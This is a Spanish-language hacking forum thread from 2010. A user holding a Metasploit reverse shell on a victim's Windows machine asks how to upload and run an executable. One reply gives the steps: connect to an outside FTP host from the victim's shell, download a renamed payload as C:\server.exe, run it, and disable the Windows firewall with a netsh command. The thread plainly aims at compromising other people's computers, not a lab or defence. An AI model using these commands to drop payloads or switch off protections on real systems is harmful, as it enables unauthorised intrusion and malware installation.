elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Subir y ejecutar exe en shell remota
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Subir y ejecutar exe en shell remota  (Leído 7,687 veces)
illera88


Desconectado Desconectado

Mensajes: 397


Ver Perfil
Subir y ejecutar exe en shell remota
« en: 11 Noviembre 2010, 02:52 am »

Pues eso es lo que estoy preguntando:
Consigo sin problemas una shell en metasploit haciendo un ataque en WAN. Utilizo el payload shell/reverse_tcp ya que el metetreper en el exploit que yo uso no tiene buenos resultados. Al caso, simplmente quiero una vez que ya tengo la shell subir y ejecutar un exe. He buscado pero no he encontrado exactamente el comando para hacerlo...

Alguien sabe como hacerlo???
Gracias ;);)
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.721


$M


Ver Perfil WWW
Re: Subir y ejecutar exe en shell remota
« Respuesta #1 en: 11 Noviembre 2010, 03:15 am »

Supongo qué querrás decir lo siguiente,

http://foro.elhacker.net/hacking_avanzado/metasploit_subir_archivos_y_crear_clave_dentro_del_registro-t278823.0.html
:http://shellrootsecurity.blogspot.com/2009/12/subir-archivos-y-crear-clave-dentro-del_17.html

« Última modificación: 11 Noviembre 2010, 03:19 am por Shell Root » En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
Edu


Desconectado Desconectado

Mensajes: 1.082


Ex XXX-ZERO-XXX


Ver Perfil
Re: Subir y ejecutar exe en shell remota
« Respuesta #2 en: 11 Noviembre 2010, 21:20 pm »

Y podrias descargarle tu ejecutable desde FTP, entiendes?
En línea

illera88


Desconectado Desconectado

Mensajes: 397


Ver Perfil
Re: Subir y ejecutar exe en shell remota
« Respuesta #3 en: 14 Noviembre 2010, 02:22 am »

El video está muyu bien.... eso ya lo habia hecho pero lo que tengo es una shell. No la session de metetreper ya que tu usas el PAYLOAD de metetreper y yo el de shell/reverse_tcp...
Y claro el comando upload no está en la shell(consola msdos de toda la vida).

Lo que he pensado es que tiene que existir un comando para descargar un archivo por linea de comandos...
Algo como el wget de linux de toda la vida...
Entonces subiria el archivo a cualquier hosting que acepte exe y luego lo descargaría y ejecutaría por linea de comandos... Sabéis como se hace eso???
O lo que dice xxx-zero-xxx desde un ftp pero no se el comando para descargar nada desde la consola :S:S
Aver si alguien me lo dice.
Gracias
« Última modificación: 14 Noviembre 2010, 02:27 am por illera88 » En línea

Edu


Desconectado Desconectado

Mensajes: 1.082


Ex XXX-ZERO-XXX


Ver Perfil
Re: Subir y ejecutar exe en shell remota
« Respuesta #4 en: 14 Noviembre 2010, 22:24 pm »

Pero lo de la extensión lo arreglas subiendo al ftp el server.zip ( no comprimido sino solo cambiado la extensión), despues desde la shell pones
ftp ftp.webcindario.com   ( por ejemplo)
te pide para poner usuario, lo pones xD, y cuando pida la password no te asustes si no escribe nada solo escribela y dale a enter. Y despues q estas conectado podes poner:
dir   --> lista los archivos en tu ftp
get server.zip  C:\server.exe

Fijate como hice lo de el cambio de extensiones y despues esperas q lo descargue y luego sales del ftp poniendo el comando: bye

y luego ejecutas el server.exe si es lo q querias hacer..



pd: Pero claro q si usas ftp la pc victima tendra q abrir el puerto 21 pero podes desactivarle el firewall de windows por ejemplo en windows xp q es poniendo en la shell:  %windir%\System32\netsh.exe firewall set opmode disable
En línea

illera88


Desconectado Desconectado

Mensajes: 397


Ver Perfil
Re: Subir y ejecutar exe en shell remota
« Respuesta #5 en: 14 Noviembre 2010, 23:06 pm »

Pero lo de la extensión lo arreglas subiendo al ftp el server.zip ( no comprimido sino solo cambiado la extensión), despues desde la shell pones
ftp ftp.webcindario.com   ( por ejemplo)
te pide para poner usuario, lo pones xD, y cuando pida la password no te asustes si no escribe nada solo escribela y dale a enter. Y despues q estas conectado podes poner:
dir   --> lista los archivos en tu ftp
get server.zip  C:\server.exe

Fijate como hice lo de el cambio de extensiones y despues esperas q lo descargue y luego sales del ftp poniendo el comando: bye

y luego ejecutas el server.exe si es lo q querias hacer..



pd: Pero claro q si usas ftp la pc victima tendra q abrir el puerto 21 pero podes desactivarle el firewall de windows por ejemplo en windows xp q es poniendo en la shell:  %windir%\System32\netsh.exe firewall set opmode disable


Muchas gracias por tu ayuda pero si ya necesito historias de andar abriendo puertos, desactivando firewalls... Se que lo del firewall no es más que un comando (suponiendo que usa el firewall de windows y no el del AV...) pero luego para abrir los puertos???
No se puede de la forma que te digo descargando directamente el archivo de un hosting (por ejemplo localhostr o el que sea...) y luego ya ejecutando el exe mediante linea de comandos???
Gracias de nuevo!!! ;-) ;-)
En línea

Edu


Desconectado Desconectado

Mensajes: 1.082


Ex XXX-ZERO-XXX


Ver Perfil
Re: Subir y ejecutar exe en shell remota
« Respuesta #6 en: 15 Noviembre 2010, 00:37 am »

Pero si desactivas el firewall de windows no vas a necesitar abrir el puerto 21 ya q es como si estuvieran todos abiertos xD, claro.. si es q no usa router la victima porq sino tendria q abrirlo desde el router tamb pero como todo.. va siempre depende de la victima las cosas q tendras q hacer.

La verdad se me ocurren cosas si pero seria muy complicado, algo como crear un script linea por linea xD
En línea

illera88


Desconectado Desconectado

Mensajes: 397


Ver Perfil
Re: Subir y ejecutar exe en shell remota
« Respuesta #7 en: 15 Noviembre 2010, 03:03 am »

joooodeeerrr... con lo facil que es con el metetreper....

Entonces no existe ningun comando para desgargar algo de una URL???
un saludo y gracias
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
ayuda para subir shell
Nivel Web
varc 3 3,135 Último mensaje 9 Junio 2012, 00:44 am
por MauroMasciar
Problema al subir shell
Hacking
Mario Olivera 2 1,954 Último mensaje 1 Agosto 2014, 01:22 am
por Mario Olivera
Subir Shell Mediante SQLMAP
Bugs y Exploits
sombra_aprendiz 1 3,272 Último mensaje 30 Julio 2015, 01:45 am
por T. Collins
¿Es posible ejecutar .bat vía remota?
Scripting
BALTA00 1 1,364 Último mensaje 3 Octubre 2016, 02:23 am
por GreenTick
Post-explotacion: No puedo ejecutar algunos comandos desde shell remota de Win
Seguridad
Ethicalsk 1 1,973 Último mensaje 15 Septiembre 2017, 02:25 am
por edwinosky
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines